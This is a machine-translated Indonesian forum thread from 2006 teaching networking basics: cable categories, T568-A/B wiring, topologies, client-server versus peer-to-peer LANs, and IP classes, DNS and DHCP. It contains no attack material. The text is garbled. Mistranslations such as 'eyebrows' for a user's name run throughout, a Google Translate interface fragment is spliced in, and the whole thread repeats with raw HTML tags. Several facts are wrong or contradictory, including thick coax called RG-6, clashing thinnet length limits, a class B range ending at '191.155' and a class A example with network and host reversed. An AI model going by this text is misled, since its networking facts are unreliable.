1. Higher access speeds due to the provision of network facilities and management carried out
exclusively by a single computer (server) that is not burdened with other tasks as a workstation.
2. Security systems and network administration is better, because there was a user who served as a
network administrator, who manages the administration and security systems
network.
3. Data backup system is better, because on a client-server network is centered on the backup server,
which will backup all the data used in the network.

Weakness
1. Operational costs are relatively more expensive.
2. Required a special computer that is more capable for the assigned
as a server.
3. Continuity of the network depends on the server. If the server is susceptible to interference, then
the whole network will be disrupted.
2. Peer To Peer Network
--------------------------
When viewed from the role of both types of servers in the network, the network server in a peer to
peer type is termed non-dedicated server, because the server does not act as a pure server but at the
same time can serve as workstation. (lha?)

Advantages
1. Between computers in a network can share each owned facilities such as: hard disk, drive, fax /
modem, printer.
2. Operational costs are relatively cheap compared to the type of client-server network, one
only because it does not require any server that has a special ability to organize and provide
network facilities.
3. Continuity of the network work does not depend on a single server. So that if one computer / peer
dead or damaged, the entire network will not be susceptible to interference.

Weakness
1. Network troubleshooting is relatively more difficult, because the network of peer to peer type of
each computer it is possible to engage in communication that exists. In client-server network, the
communication is between the server with the workstation.
2. Lower performance compared to client-server network, because every computer / peer in addition
to managing the use of network facilities also need to manage their own job or application.
3. Network security system is determined by each user to manage the security of each facility
owned.
4. Because the network data is spread on each computer in the network, the backups should be
performed by each computer.

(tired euy, mending copies aja ya?)

nah, it was a glimpse of the LAN, because've most, let me not bored, we udahin first, we discuss
about the ntar protokol2nya and other hardware that supports LAN and teman2 request ..

("_")

occasionally making workshop donk ...........


__________________

"No Wealth Beyond Reason"


"No Poverty Exceeding Folly"
"No legacy Exceed Budi Pekerti"
"Not Exceed Consulting's Helper"

Email: Muammarsubki@yahoo.com

Website: http://www.subki.orgfree.com

c4m4r2006
View Public Profile
Send a private message to c4m4r2006
Find More Posts by c4m4r2006
12-23-2006, 11:28 PM # 18
journalists jh
Imum Mukim

Join Date: Nov 2006


Location: d / h AlisBandung
Posts: 2.246
Thanks: 3
Thanked 18 Times in 9 Posts

-------------------------------------------------- ------------------------------

wah workshop? eyebrows in bandung nih


__________________
Master the world with information

My Blog
My Friendster
My Facebook

journalists jh
View Public Profile
Send a private message to journalists jh
Find More Posts by journalists jh

12-27-2006, 02:50 PM # 19
Muiz
Peutua

Join Date: Dec 2006


Posts: 752
Thanks: 0
Thanked 5 Times in 2 Posts

-------------------------------------------------- ------------------------------

Quote:
Originally Posted by AlisBandung
---------------------

jadi gini, UTP cable (there are 8 colored wires) that do have standards, so that in each country that
use uniformity in the implementation pnya, well until now known UTP eyebrows, there used 2 yag
standards, namely:
1. Standard T568-A

Pin Color
--------------------
White and 1 hijo
2 hijo
3 white-orange
4 Blue
5 white and blue
6 Orange
7 white and brown
8 brown

2. T568-B standard

Pin Color
--------------------
White and 1 orange
2 Orange
3 white and hijo
4 Blue
5 white and blue
6 hijo
7 white and brown
8 brown

Ntar 2 standard is used when the cable is used for straight, rollover, or crossover, gini explanation:

Straight-Through
=================
This type of cable used to connect the workstation with the hub / switch. This cable also has 4 pairs
(8 wire) where each pin between the one end with the other end must be the same. That is, if one
end using a standard T568-A will end only had to wear T568-A as well. And vice versa, if one end
using a standard T568-B, the other end must also use the same standard.

Rollover
========
Used for connection between a workstation to the console port on a router or switch. Standard used
is T568-A on one end and
the other end of the sequence T568-A stay in roll (reversed). Likewise, if used

Sumbangkan terjemahan yang lebih baik


Terima kasih telah menyumbangkan saran terjemahan Anda ke Google Terjemahan.
Menyumbangkan terjemahan yang lebih baik:
ya learn all about networking, and not let this topic quiet, mending his eyebrows writing about
networking aja deh, kalo mau said, posting aja, kalo kalo be answered can not thank there is another
friend who ngejawab <br> <br>not really know where ya from nGoMongNya, but since this thread
dimulail with cable, our cables bahs little about it .. maap kalo udah boring for the tau, a pretty, for,
for science to not know <br> <br>cable <br>===== <br>talk about the network, would not his
name off of the cable, although now its time udah wireless, but cable will be the lesson material
may not be forgotten by the network equipment, wireless now anyway still hold to the teaching
(emang silat?) wired, for example, optical etc. lah <br> <br>principles still work light, cable
ngubungin one side with the other side of the terminator in masing2 end, but this relationship did
not lead to a closed relationship between the 2-sided, can be set to open 2 connections with the
other side <br> <br>now you&#39;ve advanced age, so the cable topology is also growing, from
the telegraph era technology that make up its time radio and optical fiber lasers. <br> <br>cable
types nih <br>=================== <br>Each type of cable has the ability and different
specifications, hence the introduction was made the type of cable. <br>There are two types of
cables are generally known, namely: <br>1. twisted pair: UTP (unshielded twisted pair) and STP
(shielded twisted pair) 2. coaxial cable. <br> <br>Categories for the twisted pair: <br> <br>Cable:
CAT Type 1 <br>type: UTP <br>features: analog (typically used in telephone device in general and
the ISDN lines, and integrated-services digital networks. Also, to connect the modem to the
telephone line). <br> <br>Cable: CAT Type 2 <br>type: UTP <br>features: up to 1 Mbits (often
used in token ring topology) <br> <br>Cable: Type CAT 3 <br>type: UTP / STP <br>features: 16
Mbits of data transfer (often used in token ring topology or <br>10BaseT) <br> <br>Cable: Type
CAT 4 <br>type: UTP, STP <br>features: 20 Mbits of data transfer (typically used on token ring
topology) <br> <br>Cable: Type CAT 5 <br>type: UTP, STP <br>features: up to 100 MH. 100
Mbits of data transfer / 22 db <br> <br>Cable: Type CAT 5enhanced <br>type: UTP, STP
<br>features: up to 100 MHz.1 Gigabit Ethernet up to 100 meters - 4 copper <br>pairs (two types
of CAT5 often used in token ring topology 16Mbps, 10Mbps Ethernet or FastEthernet 100Mbps)
<br> <br>Cable: Type CAT 6 <br>type: UTP, STP <br>features: up to 155 MHz or 250 MHz. 2.5
Gigabit Ethernet up to 100 meters or 10 <br>Gbit / s up to 25 meters. 20.2 db (Gigabit Ethernet)
<br> <br>Cable: Type CAT 7 <br>type: UTP, STP <br>features: up to 200 MHz or 700 MHz Giga-
Ethernet / 20.8 db (Gigabit Ethernet) <br> <br>This type of cable, not to memorize his eyebrows
too lho ... ngambilnya from: <br>http://www.glossary-tech.com/cable.htm and
http://www.firewall.cx/cabling_utp.php <br> <br>Giving 1/2/3/4/5/6 category is the category
specifications for each copper cable and also for jack. Each is a series of revisions for the quality of
cable, quality cable wrap (insulation) and also for the quality of &quot;entanglement&quot; (twist)
of each pair of wires. In addition, to determine the frequency scale can pass on the cable facilities,
and also the quality of insulation that can reduce the induction effect between the wires (noise can
be suppressed in such a way ).------&gt; physics banget tuh <br> <br>Keep in mind also (ingak..
Ingak), the specification between CAT5 and CAT5 has enchanced the same industry standard, but
the CAT5e already equipped with insulation to reduce the effects of induction or electromagnetic
interference. CAT5e cable can be used to connect the network to <br>1Gbps speed. (bokkkkkk giga
buset. .1) <br> <br>As for coaxial cable, there are two types, namely <br> <br>1. thick coaxial
cable (has a fairly large diameter) <br>Coaxial cable of this type is specified by IEEE 802.3
10BASE5, where the cable has an average diameter of 12mm, and is usually given a yellow color;
this type of cable is commonly referred to as a standard ethernet or thick Ethernet, or simply
abbreviated thicknet, or even mentioned cuman <br>as a yellow cable. <br> <br>This Coaxial
cable (RG-6) when used in the specification and the network has the following rules: <br>* Each
end should be terminated with 50-ohm terminator (terminator is recommended to use already
assembled, instead of using one 50-ohm resistors 1 watt, for dissipative voltage resistors have a
fairly wide, experts kalo, can critical nih). <br>* Maximum of 3 segments with the connected
equipment (attached devices) or a populated segments. <br>* Every network card has an additional
transmitter (external transceiver). <br>* Each segment contains a maximum of 100 network
devices, including repeaters in this case. <br>* Maximum cable length per segment is 1640 feet (or
about 500 meters). <br>* Maximum distance between the segment is 4920 feet (or about 1500
meters). <br>* Each segment must be grounded. <br>* Rarely maximum of tap or pencabang from
the main cable to the device (device) is 16 feet (about 5 meters). <br>* The minimum inter-tap Jaral
is 8 feet (about 2.5 meters). <br> <br>2. Thin coaxial cable (Coaxial cable &quot;Skinny&quot;)
<br>This type of coaxial cable widely used in amateur radio circles, especially for transceivers that
do not require a large power output. To be used as a network device, this type coaxial cable must
meet IEEE 802.3 10BASE2, where the average diameter ranges from 5mm and <br>usually black
or other dark colors. Each device (device) is connected with BNC T-connector. This type of cable is
also known as Thin Ethernet or thinnet. <br>This type of coaxial cable, such as the type RG-58 A /
U or C / U, if implemented with TConnector and terminator in a network, must follow the following
rules: <br>* Each end of the cable rated 50-ohm terminator. <br>* The maximum length of cable is
1.000 feet (185 meters) per segment. <br>* Each segment maximum of 30 devices connected to the
network (devices) <br>* Network card is using the onboard transceiver, do not need additional
transceiver, except for the repeater. <br>* Maximum is 3 segments connected to each other
(populated segments). <br>* Each segment should be equipped with a ground. <br>* The minimum
length between the T-Connector is 1.5 feet (0.5 meters). <br>* Maximum cable length in one
segment is 1.818 feet (555 meters). <br>* Each segment has a maximum of 30 devices connected.
<br> <br>Thus glimpse of the cable and tipe2nya <br>many and the reply was talking about cable,
but since his udah sore, and stiff neck&#39;ve, we went on a day or two yes <br> <br>This type of
cable, not to memorize his eyebrows too lho ... ngambilnya from: <br>http://www.glossary-
tech.com/cable.htm and http://www.firewall.cx/cabling_utp.php <br>with English lessons capital,
hhe .. <br> <br>we will ngebahas ntar network topology which is a &quot;work program&quot; of
the cable itself <br> <br>hopefully helpful <br>__________________ <br>Master the world with
information <br> <br>My Blog <br>My Friendster <br>My Facebook <br> <br>
<br>journalists jh <br>View Public Profile <br>Send a private message to journalists jh <br>Find
More Posts by journalists jh <br> <br> 12-12-2006, 01:31 pm # 3 <br>journalists jh <br>Imum
Mukim <br> <br> <br> <br> <br>Join Date: Nov 2006 <br>Location: d / h AlisBandung
<br>Posts: 2.246 <br>Thanks: 3 <br>Thanked 18 Times in 9 Posts <br> <br> <br>
<br>-------------------------------------------------- ------------------------------ <br> <br>network
topology <br>================= <br> <br>enter the next chapter nih, hhe (sok jago) <br>
<br>determination of network topology will determine the type of cable we will pake, and vice
versa, the availability of cable and have gocek yangkita, a mind dong to build a network (for the
future we call the network, let cool) <br> <br>actually, loads of network topology, but we often
hear that only 3 doang, and that many were also based on the 3, only the perpetrator kadang2
modify slightly depending on network conditions, eg area, length of cord, etc. <br> <br>three of
them who wrote it: <br> <br>1. ring topology <br>This topology Manfaatin closed curve, meaning
information and data as well as distributed in such traffic <br>way that to each node. These
facilities generally use optical fiber as a facility <br>(although some are using twisted pair).
<br>(bahasannya above) <br> <br>2. linear bus topology <br>Linear bus topology is a topology
widely used in the mushrooming use of Coaxial cable. By using the T-Connector (with a 50ohm
terminator on the end of the network), then the computer or other network devices can be easily
connected to each other. <br>The main difficulty of using coaxial cables is difficult to measure
whether the coaxial cable that is used completely matching or not. Because that was really not
properly measured will damage the NIC (network interface card) that is used and the network
performance becomes constrained, not reaching maximum capacity. This topology is also frequently
used on networks with fiber optic base (which later merged with a star topology to connect
<br>with the client or node). <br> <br>3. star topology <br>Network topology is widely used in
various places, because of the ease to add, reduce or detect existing tissue damage. In addition,
cable length issues that must be appropriate (matching) also did not become an important anymore.
Just from there hub (which is still wrong of course) then it could be terhubunglah some computers
and network resources easily. <br>Armed with crimtool, UTP cable (CAT5 usually) and the
connector, one easily create a network system. Of course there are some losses due to cable length
(loss effect) or due to conduction law, but most can say all that can
be ignored. <br> <br>Third exposure topology above only as an introduction. The point is that a
network can be <br>is a combination of two or three topologies above. For example, there is a call
tree topology, <br>where this topology is a combination or combinations of the three existing
topology. <br> <br>It briefly about the network topology, in fact better kalo pictures, but my
eyebrows are still confused, how ya how to upload pictures in posts? <br>__________________
<br>Master the world with information <br> <br>My Blog <br>My Friendster <br>My Facebook
<br> <br> <br>journalists jh <br>View Public Profile <br>Send a private message to
journalists jh <br>Find More Posts by journalists jh <br> <br> 12-12-2006, 01:41 pm # 4
<br>ihan_sunrise <br>Contributor <br> <br> <br> <br> <br>Join Date: Apr 2006 <br>Location:
State of the Shari&#39;a <br>Posts: 2,210 <br>Thanks: 0 <br>Thanked 25 Times in 10 Posts <br>
<br> <br> <br>-------------------------------------------------- ------------------------------ <br> <br>ups
load images from photobucket first to write a new ..... then enter here ... I think once dah ad
description, cuman ihan forgot what thread <br>__________________ <br>My love has embraced
<br>and I was relieved to be held <br>has attracted miss my <br>and I&#39;m glad he&#39;s not
letting me <br> <br>Ihan Sunrise <br>http://ihansunrise.blogspot.com/ <br> <br>
<br>ihan_sunrise <br>View Public Profile <br>Send a private message to ihan_sunrise <br>Visit
ihan_sunrise&#39;s homepage! <br>Find More Posts by ihan_sunrise <br> <br> 12-12-2006,
05:09 PM # 5 <br>baiquni <br>Peutua <br> <br> <br> <br> <br>Join Date: Mar 2006
<br>Location: banda aceh <br>Posts: 571 <br>Thanks: 0 <br>Thanked 10 Times in 5 Posts <br>
<br> <br> <br>-------------------------------------------------- ------------------------------ <br>
<br>makasih ya brow ... eyebrows share knowledge may be useful for us all amien. <br>
<br>Eyebrows ... gi doing? <br>__________________ <br>One heart ... One guess ... Supposedly!
<br> <br>My Blogs: http://www.baiquni.net/ <br>My Wordpress: http://baiquni.wordpress.com/
<br>My Friendster: http://www.friendster.com/mbaiquni <br>My Bussiness: http://www.ipulsa.net/
<br> <br> <br>baiquni <br>View Public Profile <br>Send a private message to baiquni
<br>Visit baiquni&#39;s homepage! <br>Find More Posts by baiquni <br> <br> 12-15-2006,
12:58 PM # 6 <br>journalists jh <br>Imum Mukim <br> <br> <br> <br> <br>Join Date: Nov
2006 <br>Location: d / h AlisBandung <br>Posts: 2.246 <br>Thanks: 3 <br>Thanked 18 Times in
9 Posts <br> <br> <br> <br>-------------------------------------------------- ------------------------------
<br> <br>Quote: <br>Originally Posted by baiquni <br>makasih ya brow ... eyebrows share
knowledge may be useful for us all amien. <br> <br>Eyebrows ... gi doing? <br> <br>amen ...
eyebrows not think there is a response, hhe .. <br>ntar we start again with the LAN ... but now
again searching first bahan2 TA, tomorrow it in another connection <br>__________________
<br>Master the world with information <br> <br>My Blog <br>My Friendster <br>My Facebook
<br> <br> <br>journalists jh <br>View Public Profile <br>Send a private message to
journalists jh <br>Find More Posts by journalists jh <br> <br> 12-15-2006, 01:32 PM # 7
<br>sHinOsuke <br>Super Moderator <br> <br> <br>Join Date: Feb 2006 <br>Posts: 1.363
<br>Thanks: 16 <br>Thanked 47 Times in 14 Posts <br> <br>
<br>-------------------------------------------------- ------------------------------ <br> <br>uh if you want to
make anything WLAN aja ya devices in need <br>__________________ <br>Blogs Fadli MySQL
Database Free Article <br> <br> <br>sHinOsuke <br>View Public Profile <br>Send a private
message to sHinOsuke <br>Find More Posts by sHinOsuke <br> <br> 12-15-2006, 03:33 PM # 8
<br>aloysurf <br>Photographer <br> <br> <br>Join Date: Nov 2006 <br>Location: On The Beach
<br>Posts: 1.942 <br>Thanks: 8 <br>Thanked 4 Times in 4 Posts <br> <br>
<br>-------------------------------------------------- ------------------------------ <br> <br>Quote:
<br>Originally Posted by AlisBandung <br>It briefly about the network topology, in fact better
kalo pictures, but my eyebrows are still confused, how ya how to upload pictures in posts? <br>
<br>Let&#39;s see here http://acehforum.or.id/showthread.php?t=2740 <br>Hopefully have the
pleasure ... <br> <br>Regard <br> <br> <br>aloysurf <br>View Public Profile <br>Send a
private message to aloysurf <br>Visit aloysurf&#39;s homepage! <br>Find More Posts by aloysurf
<br> <br> 12-17-2006, 11:22 PM # 9 <br>Muiz <br>Peutua <br> <br> <br>Join Date: Dec 2006
<br>Posts: 752 <br>Thanks: 0 <br>Thanked 5 Times in 2 Posts <br> <br>
<br>-------------------------------------------------- ------------------------------ <br> <br>Quote:
<br>Originally Posted by AlisBandung <br>amen ... eyebrows not think there is a response, hhe ..
<br>ntar we start again with the LAN ... but now again searching first bahan2 TA, tomorrow it in
another connection <br> <br>ow .. steadily busy flying again instead of TA could bagi2 .. oya solid
science to the way it pairs UTP cable plus a bit of donk bang,,, let me steady ... all the way for the
router pc in Indonesian ... ya bang ... sep ... steady brow bang create .. <br> <br> <br>Muiz
<br>View Public Profile <br>Send a private message to Muiz <br>Find More Posts by Muiz <br>
<br> 12-18-2006, 05:29 PM # 10 <br>Acheh <br>Geuchik <br> <br> <br> <br> <br>Join Date:
Feb 2006 <br>Location: Earth God <br>Posts: 996 <br>Thanks: 31 <br>Thanked 14 Times in 4
Posts <br> <br> <br>-------------------------------------------------- ------------------------------ <br>
<br>This thread more sip klo accompanied by pictures .. <br>eg coaxial cable, nah .. gmn
coaxialnya image gtu ... <br> <br> <br>Acheh <br>View Public Profile <br>Send a private
message to Acheh <br>Find More Posts by Tsunami <br> <br> 12-18-2006, 09:24 PM # 11
<br>journalists jh <br>Imum Mukim <br> <br> <br> <br> <br>Join Date: Nov 2006
<br>Location: d / h AlisBandung <br>Posts: 2.246 <br>Thanks: 3 <br>Thanked 18 Times in 9
Posts <br> <br> <br> <br>-------------------------------------------------- ------------------------------
<br> <br>@ Acheh <br>it bothered ya make nambahin picture here, so males are also euy .. hhe
<br> <br>@ Muiz <br>pc router and installing UTP ya ... <br>tomorrow we continued ya ... <br>
<br>@ Shinosuke <br>sip deh, but before the WLAN, we&#39;ll eat it aja dulu ya .. <br>
<br>continued much .... <br> <br>yesterday we&#39;ve ngebahas ama topologinya cable, now
we&#39;ll discuss one implementation, the LAN <br> <br>ni era as the development, we not only
know doang LAN, but now there&#39;ve WLAN, Wireless LANs ie, the wireless LAN (simplenya
so). <br> <br>Local Area Network (LAN) is the number of computers that are connected together
in one particular area that is not so large, as in an office or building. <br> <br>In communications,
there are two types of network or LAN, a network of Peer to Peer and Client-Server networks. <br>
<br>In peer to peer network, every computer connected to the network can act both as a
workstation or server. Whereas the client-server networks, only one computer that served as servers
and other computers acting as workstations. Between the two types of networks <br>these each
have advantages and weaknesses, we&#39;ll discuss ntar lebuh far <br> <br>outlined, LAN was
supported by 2 main components, namely: <br>1. Physical Kompenen as a PC, the NIC (Network
Interface Card), cable and topologinya <br>2. Kompenen software like the operating system,
Network Adapter Driver and network protocols themselves <br> <br>fuck the hell tu lis?
<br>let&#39;s discuss satu2 aja .. <br> <br>PC <br>dear, gak banget deh discuss our problems
pake PC today, but we will discuss a working PC in the network aja. <br>Type personal computers
used in the network will greatly determine the performance of the network. Computers with high
performance will be able to send and access data in the network quickly. <br>Tissue type in the
Client-Server, a computer that functioned as an absolute server must have a performance higher
than the computers <br>others as his workstation, because the server will be responsible for
providing facilities and <br>managing the network operations <br> <br>NIC <br>Based on the
type of buses, there are several types of network interface card (nic) or network card, which is the
ISA and PCI. <br>We have kind of network cards that are widely used, the PCI <br>for more
details, see aja LAN Card-Sodara Sodara home .. not on board like a brow, hhe .. <br> <br>cable
and network topology <br>aja look at previous posts <br> <br>NAD <br>instead we Naggroe ya,
but Network Adapter Card. Each network card will have a driver or program that serves to activate
and configure the network adapter is adapted to the environment in which network cards are
installed to be used for data communication. <br> <br>operating systems <br>OS here is not like
Windows and Linux, but OS peer to peer and Client / Server. discussed satu2 ... <br> <br>1. Client-
Server Network <br>------------------------- <br>Servers are computers that provide facilities for
other computers in the network and client are the computers that receive or use the facilities
provided by the server. Dijaringan Server client-server type is called the Dedicated Server for
purely acting as servers that provide facilities to workstations and servers can not serve as
workstation. <br> <br>Advantages <br>1. Higher access speeds due to the provision of network
facilities and management carried out exclusively by a single computer (server) that is not burdened
with other tasks as a workstation. <br>2. Security systems and network administration is better,
because there was a user who
served as a network administrator, who manages the administration and security systems
<br>network. <br>3. Data backup system is better, because on a client-server network is centered
on the backup server, which will backup all the data used in the network. <br> <br>Weakness
<br>1. Operational costs are relatively more expensive. <br>2. Required a special computer that is
more capable for the assigned <br>as a server. <br>3. Continuity of the network depends on the
server. If the server is susceptible to interference, then the whole network will be disrupted. <br>
<br> <br>2. Peer To Peer Network <br>-------------------------- <br>When viewed from the role of
both types of servers in the network, the network server in a peer to peer type is termed non-
dedicated server, because the server does not act as a pure server but at the same time can serve as
workstation. (lha?) <br> <br>Advantages <br>1. Between computers in a network can share each
owned facilities such as: hard disk, drive, fax / modem, printer. <br>2. Operational costs are
relatively cheap compared to the type of client-server network, one <br>only because it does not
require any server that has a special ability to organize and provide network facilities. <br>3.
Continuity of the network work does not depend on a single server. So that if one computer / peer
dead or damaged, the entire network will not be susceptible to interference. <br> <br>Weakness
<br>1. Network troubleshooting is relatively more difficult, because the network of peer to peer
type of each computer it is possible to engage in communication that exists. In client-server
network, the communication is between the server with the workstation. <br>2. Lower performance
compared to client-server network, because every computer / peer in addition to managing the use
of network facilities also need to manage their own job or application. <br>3. Network security
system is determined by each user to manage the security of each facility owned. <br>4. Because
the network data is spread on each computer in the network, the backups should be performed by
each computer. <br> <br>(tired euy, mending copies aja ya?) <br> <br>nah, it was a glimpse of the
LAN, because&#39;ve most, let me not bored, we udahin first, we discuss about the ntar
protokol2nya and other hardware that supports LAN and teman2 request .. <br>
<br>(&quot;_&quot;) <br>__________________ <br>Master the world with information <br>
<br>My Blog <br>My Friendster <br>My Facebook <br> <br> <br>journalists jh <br>View
Public Profile <br>Send a private message to journalists jh <br>Find More Posts by journalists jh
<br> <br> 12-18-2006, 07:28 PM # 12 <br>Muiz <br>Peutua <br> <br> <br>Join Date: Dec 2006
<br>Posts: 752 <br>Thanks: 0 <br>Thanked 5 Times in 2 Posts <br> <br>
<br>-------------------------------------------------- ------------------------------ <br> <br>Quote:
<br>Originally Posted by Acheh <br>This thread more sip klo accompanied by pictures .. <br>eg
coaxial cable, nah .. gmn coaxialnya image gtu ... <br> <br>yup .. pake clearer picture added ..
rame .. n eager learner makasi ... <br> <br> <br> <br> <br>Muiz <br>View Public Profile
<br>Send a private message to Muiz <br>Find More Posts by Muiz <br> <br> 12-18-2006, 07:56
PM # 13 <br>Muiz <br>Peutua <br> <br> <br>Join Date: Dec 2006 <br>Posts: 752 <br>Thanks:
0 <br>Thanked 5 Times in 2 Posts <br> <br> <br>--------------------------------------------------
------------------------------ <br> <br>sep bang brow <br> <br> <br> <br> <br>Muiz <br>View
Public Profile <br>Send a private message to Muiz <br>Find More Posts by Muiz <br> <br>
12-20-2006, 11:33 PM # 14 <br>journalists jh <br>Imum Mukim <br> <br> <br> <br> <br>Join
Date: Nov 2006 <br>Location: d / h AlisBandung <br>Posts: 2.246 <br>Thanks: 3 <br>Thanked
18 Times in 9 Posts <br> <br> how to installing UTP cable <br>
<br>-------------------------------------------------- ------------------------------ <br>
<br>--------------------- <br> <br>jadi gini, UTP cable (there are 8 colored wires) that do have
standards, so that in each country that use uniformity in the implementation pnya, well until now
known UTP eyebrows, there used 2 yag standards, namely: <br> <br>1. Standard T568-A <br>
<br>Pin Color <br>-------------------- <br>White and 1 hijo <br>2 hijo <br>3 white-orange <br>4
Blue <br>5 white and blue <br>6 Orange <br>7 white and brown <br>8 brown <br> <br>2. T568-
B standard <br> <br>Pin Color <br>-------------------- <br>White and 1 orange <br>2 Orange <br>3
white and hijo <br>4 Blue <br>5 white and blue <br>6 hijo <br>7 white and brown <br>8 brown
<br> <br>Ntar 2 standard is used when the cable is used for straight, rollover, or crossover, gini
explanation: <br> <br>Straight-Through <br>================= <br>This type of cable used
to connect the workstation with the hub / switch. This cable also has 4 pairs (8 wire) where each pin
between the one end with the other end must be the same. That is, if one end using a standard T568-
A will end only had to wear T568-A as well. And vice versa, if one end using a standard T568-B,
the other end must also use the same standard. <br> <br>Rollover <br>======== <br>Used for
connection between a workstation to the console port on a router or switch. Standard used is T568-
A on one end and <br>the other end of the sequence T568-A stay in roll (reversed). Likewise, if the
use is T568-B standard. <br> <br>Crossover <br>=========== <br>Is a type of cable used to
connect between workstations or between the hub / switch. This type of cable using standard T568-
A at one end, and T568-B on the other end. <br> <br>There are little ways masangnya: <br> <br>1.
Cable manufacture <br>a) Prepare the UTP cable and RJ 45 as the interface <br>b) Cut the end of
the cable jacket approximately 1.5 cm with a craft knife or scissors, and remove the jacket. Be
careful in peeling the jacket, do not get cable in it come truncated. <br>c) or open loops Untwist
each pair cable <br>d) To create a straight-Trough cable, crossover or rollover, see the standard
T568-A or T568-B <br>e) Match each type of cable with standardnya, then point to allow to be
inserted into the RJ 45 <br>f) When you&#39;ve put into RJ 45, crimpinglah by using existing
equipment in order to become permanent and the cable is not easily shaken <br>g) Check the cord
first before dicrimping sequence, because the cable is already dicrimping no longer be revoked.
This means that if we are wrong sort spouse or insert it into the RJ 45 or less perfect, most likely the
cable can not be used <br> <br>2. Test cable <br>a) Cables that have been dicrimping fault can be
detected using a cable tester (eg: Fluke 620 LSN CableMeter) <br>b) If there is no cable tester,
attach the cable from the NIC to the hub (if the type of straight-through) and inter-workstation if the
cord is kind of crossover. <br>c) Pekailah ping command to test the cable. If the connection can be
formed, means making your cables are correct. Conversely, if the connection can not be formed,
means that there are mistakes in the cabling process. <br> <br>hopefully helpful
<br>__________________ <br>Master the world with information <br> <br>My Blog <br>My
Friendster <br>My Facebook <br> <br> <br>journalists jh <br>View Public Profile <br>Send a
private message to journalists jh <br>Find More Posts by journalists jh <br> <br> 12-20-2006,
11:37 PM # 15 <br>journalists jh <br>Imum Mukim <br> <br> <br> <br> <br>Join Date: Nov
2006 <br>Location: d / h AlisBandung <br>Posts: 2.246 <br>Thanks: 3 <br>Thanked 18 Times in
9 Posts <br> <br> <br> <br>-------------------------------------------------- ------------------------------
<br> <br>TCP / IP <br>=============== <br>Because an important role in the Windows
operating system and also because the TCP / IP <br>a protocol option (default) from Windows. TCP
is the Transport layer of the OSI model (Open Systems Interconnection), while the IP is the
Network layer of the OSI mode <br> <br>IP Address <br>---------- <br>IP address is the address
given on computer networks and network equipment <br>using TCP / IP. IP addresses consist of
32-bit binary numbers that can be written as four groups of decimal numbers separated by a dot
such as 192.168.0.1. <br> <br>+-------------------+-----------+ <br>| Network ID | Host ID | <br>
+-----+------+------+-----------+ <br>| 192 | 168 | 0 | 1 | <br>+-----+------+------+-----------+ <br>
<br>IP addresses consist of two parts of the network ID and host ID, where the network ID to
determine the network address of the computer, while the host ID to determine the host address
(computers, routers, switches). <br> <br>Therefore the IP address provides the full address of a
host and network address where the host is located. <br> <br>Class-class IP Address
<br>------------------------ <br>To facilitate the use, depending on the needs of users, IP addresses
are divided into three classes as shown below <br> <br>------+------------+---------------+--------------
------+ <br>Classes | Network ID Host ID | Default Subnet Mask | <br>------+-------------
+---------------+------------- -------+ <br>A | xxx.0.0.1 | xxx.255.255.254 | 255.0.0.0 | <br>B |
xxx.xxx.0.1 | xxx.xxx.255.254 | 255.255.0.0 | <br>C | xxx.xxx.xxx.1 | xxx.xxx.xxx.254 |
255.255.255.0 | <br>------+-------------+---------------+------------- -------+ <br> <br>IP address
assigned to class A network with a number of very large hosts. <br>1.xxx.xxx.xxx IP range. -
126.xxx.xxx.xxx, there are 16,777,214 (16 million) IP address on each class A. <br>IP address
assigned to class A network with a number of very large hosts. In the IP address <br>class A
network ID is the first 8 bits, while the host ID is 24 bits. <br>Thus, how to read the IP address
class A, for example, 113.46.5.6 is: <br>Network ID = 113 <br>Host ID = 46.5.6
<br>So the IP address above is hosted on a network 46.5.6 number 113 number. <br> <br>Class B
IP address is usually allocated to the network medium and large. In class B IP address, network ID
is the first 16 bits, while the host ID is 16 bits. Thus, how to read a class B IP address, such as
132.92.121.1 <br>Network ID = 132.92 <br>Host ID = 121.1 <br>So the IP address on the mean
number 121.1 on the host network number 132.92. with a length of 16-bit host ID, network with the
IP address class B can accommodate about 65,000 hosts. Range IP 128.0.xxx.xxx -
191.155.xxx.xxx <br> <br>Class C IP address originally used for small networks (LAN). Host ID
is the last 8 bits. With this configuration, can be formed about 2 million networks with each network
has 256 IP addresses. Range IP 192.0.0.xxx - 223.255.255.x. <br>The allocation of IP address is
basically the process of selecting the network ID and host ID is right for a network. Right or not this
configuration depends on the objectives to be achieved, which allocates IP addresses as efficiently
as possible. <br> <br> <br>Domain Name System (DNS) <br>------------------------- <br>Domain
Name System (DNS) is a system that allows the name of a host on a computer network or the
Internet translated into IP addresses. In giving the name, DNS uses a hierarchy architecture. <br>
<br>1. Root-level domain: the top level is displayed as a dot (.). <br>2. Top level domain: category
code or state organizations such as:. Com for use by <br>company;. edu for use by the college;. gov
for use by government agencies. In addition to distinguish between the use of the name by a country
with <br>Other countries use such marks. id to Indonesia or. au for Australia. <br>3. Second level
domain: the name for the organization or company, for example: <br>microsoft.com; yahoo.com,
and others. <br> <br> <br>DHCP (Dynamic Host Configuration Protocol)
<br>------------------------------------------- <br>IP address and subnet mask can be provided
automatically using Dynamic Host Configuration Protocol or conditions manually. <br>DHCP
function to provide IP address automatically on computers that use TCP / IP. DHCP works with the
client-server relationship, where the DHCP server provides a group of IP addresses that can be
given to the DHCP client. In providing this IP address, DHCP IP address only to lend it. So giving
this place an IP address dynamically. <br> <br>Network topology is the physical description of the
pattern of relationships between network components, including servers, workstations, hubs and
pengkabelannnya. There are three kinds of commonly used network topology, ie Bus, Star and
Ring. <br>__________________ <br>Master the world with information <br> <br>My Blog
<br>My Friendster <br>My Facebook <br> <br> <br>journalists jh <br>View Public Profile
<br>Send a private message to journalists jh <br>Find More Posts by journalists jh <br> <br>
12-20-2006, 11:38 PM # 16 <br>journalists jh <br>Imum Mukim <br> <br> <br> <br> <br>Join
Date: Nov 2006 <br>Location: d / h AlisBandung <br>Posts: 2.246 <br>Thanks: 3 <br>Thanked
18 Times in 9 Posts <br> <br> <br> <br>--------------------------------------------------
------------------------------ <br> <br>for wlan ..... <br>dibutuhin what it is? <br>kalo gak salah sih
eyebrows just need access point aja. <br>reply to the laptop&#39;s wireless udah ada tuh link, lived
in a laptop configuration aja, kalo in ordinary companies, buying used pointnya access to catch the
wave, and for all, connect the access point to a computer with a normal LAN cable ... from the AP
to the Company should pake cable, because the Company have not got a laptop .. wirelesslink such
that the brow know ... maybe there is more tau teman2 .. hhe <br>__________________
<br>Master the world with information <br> <br>My Blog <br>My Friendster <br>My Facebook
<br> <br> <br>journalists jh <br>View Public Profile <br>Send a private message to
journalists jh <br>Find More Posts by journalists jh <br> <br> 12-22-2006, 07:43 pm # 17
